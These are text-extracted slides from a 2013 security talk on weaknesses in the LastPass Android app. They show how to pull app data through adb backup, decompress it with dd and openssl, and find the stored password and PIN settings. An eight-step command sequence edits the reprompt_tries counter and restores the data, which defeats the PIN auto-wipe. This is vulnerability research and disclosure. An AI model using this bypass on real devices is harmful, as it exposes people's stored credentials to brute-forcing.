lastpass • Personal solution (w/ enterprise option) • Uses online sync • Can be secured with a PIN • Can wipe data after 5 false logons • Restricts screenshots https://lastpass.com/android Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 69
Can store lastpass.com password • So users don't need to type it EVERY time • Reduces security • Makes it usable ! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 70
Why store the PW ? Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 71
_ mySecur3L@sTp@$$p@$$w0rd1sDAb0mb&&&: Easy to remember Impossible to type! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 72
It's OK though Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 73
You can enable a PIN ! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 74
PIN Security • Limited to 4 digits! • “ auto-Wipe ” data • after 5 false logons Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 75
PIN == SECURE ! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 76
AndroidManifest.xml Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 78
AndroidManifest.xml <application android:allowBackup =“ true ”> Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 79
Default: true Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 80
adb backup com.lastpass.lpandroid – f lp.ab Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 81
What good is an .ab file ? Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 82
Android Backup (.ab) • zlib compressed (kinda) • skip header (24 bytes) • pipe to openssl w/zlib support dd if=dropbox.ab bs=24 skip=1 | openssl zlib -d > dropbox.tar Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 83
LPandroid.xml • lastpass.com username • laspass.com password (encoded) • PIN (encoded) • Settings • ... Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 86
<string name="reprompt_tries"> 0 </string> Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 87
That looks interesting! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 88
( ) THE O RY Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 89
if reprompt_tries < 5 : prompt_for_pin() else drop_the_DBass() end Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 90
Theory • reprompt_tries as iterator • increases till it reaches 5 • Sounds reasonable • edit the XML and restore it • Let's set “ reprompt_tries ” to -9999 then ;) Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 91
Proposed Attack • Backup app data • Edit XML • set “ reprompt_tries ” to -9999 • Repackage • Restore Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 92
Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 93
0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 94
Not the easiest process... Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 95
Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 96
counter++ Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 97
good news … Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 98
We get 10,000 tries Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 99
bad news … Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 100
We get 10,000 tries Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 101
Let’s make it easier Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 102
Recommend
More recommend